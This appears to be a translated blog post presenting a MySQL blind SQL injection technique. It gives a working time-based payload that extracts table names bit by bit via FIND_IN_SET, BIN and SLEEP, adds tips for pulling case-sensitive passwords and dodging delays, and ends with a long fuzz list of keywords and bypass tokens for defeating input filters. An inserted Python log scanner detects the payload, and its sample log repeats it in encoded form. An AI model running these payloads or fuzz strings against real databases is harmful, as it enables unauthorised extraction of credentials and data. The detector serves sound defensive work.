A new method to improve the efficiency of guessing in MySQL blind injection


This method outperforms the usual approaches such as dichotomy (binary search), bit-by-bit inference, etc.
Original address

Sample query request code:

AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1),'a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,$,%,^,&,*,(,),-,+,=,\,,.,,\',~,`,\\,|,{,},[,],:,;, ,')),1,1) FROM information_schema.tables LIMIT 1)=@a AND IF(@a!='',@a,SLEEP(5));

Explanation

A result of 1 is true, 0 is false, and a SLEEP(5) delay means the extracted value is empty (the position past the last bit has been reached).

For the principle, refer to the original article. The advantage of the method is that it needs fewer requests; the disadvantages are that letter case cannot be determined (MySQL string comparison does not distinguish case), that SLEEP() takes too long, and so on.

There are many things that can be optimized. For example, a-z0-9 is generally enough for guessing a user name, and for case-sensitive values such as passwords CHAR() will work, like this:

FIND_IN_SET(CHAR(MID(table_name,1,1)),'97,98,99')

SLEEP(3) takes too long, so you can consider runtime errors instead (such as 1/0, escape®ex...). Also, the first bit never needs to be guessed, since it is always 1, and so on. If you want to use this technique you have to take all of this into account, but generally speaking the method is still very sharp and I admire it.
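From the defender's side, the payload above has a distinctive fingerprint: a user-variable assignment, FIND_IN_SET and BIN wrapped around each other, a SLEEP() branch and a read from information_schema. As an added example that is not part of the original post, the following scan flags access-log requests carrying several of those markers at once; the log lines and the threshold are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not taken from the original post).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2021:10:00:01 +0000] "GET /item?id=1 HTTP/1.1" 200 512
10.0.0.7 - - [01/Mar/2021:10:00:02 +0000] "GET /item?id=1%20AND%20(SELECT%20%40a%3A%3DMID(BIN(FIND_IN_SET(MID(table_name%2C1%2C1)%2C'a%2Cb%2Cc'))%2C1%2C1)%20FROM%20information_schema.tables%20LIMIT%201)%3D%40a%20AND%20IF(%40a!%3D''%2C%40a%2CSLEEP(5)) HTTP/1.1" 200 512
10.0.0.9 - - [01/Mar/2021:10:00:03 +0000] "GET /search?q=find_in_set HTTP/1.1" 200 128
"""

# Markers that together characterise the FIND_IN_SET/BIN bit-extraction payload.
MARKERS = {
    "user_variable": re.compile(r"@\w+\s*:=", re.I),
    "find_in_set": re.compile(r"\bFIND_IN_SET\s*\(", re.I),
    "bin": re.compile(r"\bBIN\s*\(", re.I),
    "sleep": re.compile(r"\bSLEEP\s*\(", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
}

# Request target (path + query string) from a common-log-format line.
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def score_request(target: str) -> dict:
    """Return which markers appear in the URL-decoded request target."""
    # Decode twice: harmless on plain text, and it unwraps double-encoded input.
    decoded = unquote_plus(unquote_plus(target))
    return {name: bool(rx.search(decoded)) for name, rx in MARKERS.items()}


def scan_log(text: str, threshold: int = 3) -> list:
    """Return (line_number, sorted marker names) for lines at/above threshold."""
    flagged = []
    for number, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hits = score_request(match.group(1))
        names = sorted(name for name, hit in hits.items() if hit)
        if len(names) >= threshold:
            flagged.append((number, names))
    return flagged


if __name__ == "__main__":
    for number, names in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(names)}")
```

A single keyword in isolation (line 3, a search for "find_in_set") stays below the threshold, which keeps the rule from firing on ordinary traffic.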

Recommendations

I am a beginner and have only tested it in my own environment, where it is more convenient than the current dichotomy (binary search) approach.
Let me add that, in actual use, we can place more restrictions on the sleep time.
There is no need to run the character test all at once; you can apply the idea of dichotomy to the guessing as well.
Of course, when you encounter character filtering you need to perform a fuzz test first.
My own fuzz list is attached below:

and
AND
&&
or
OR
xor
||
between
binary
|
&
=
like
LIKE
>
<
(
)
')
('
()
'
"
`
@
!
/*
*/
-
+
-- 
--
--+
#
\
;
;show databases;#
;show databases;%23
.
^
,
*,1
select
SELECT
union
UNION
order
by
from
where
database
limit
offset
information
schema
table
column
count
concat
group_concat
id
regexp
substr
mid
left
ascii
sleep
join
right
updatexml
extractvalue
exp
EXP
insert
into
delete
update
alter
create
all
distinct
not
as
desc
asc
having
floor
char
;%00
geometrycollection
polygon
multipoint
multilinestring
linestring
multipolygon
handler
having
version()
database()
user()
@@datadir
@@basedir
@@version_compile_os
@@hostname
@@global.secure_file_priv
%0a
%0d
%09
%df
%20
%23
%27
%'
%1$
CREATE
END
reverse
group
if
case
drop
for
relike
rlike
like
in
else
ord
chat
hex
is
is not
outfile
bin
substring


Origin blog.csdn.net/weixin_46250265/article/details/114174109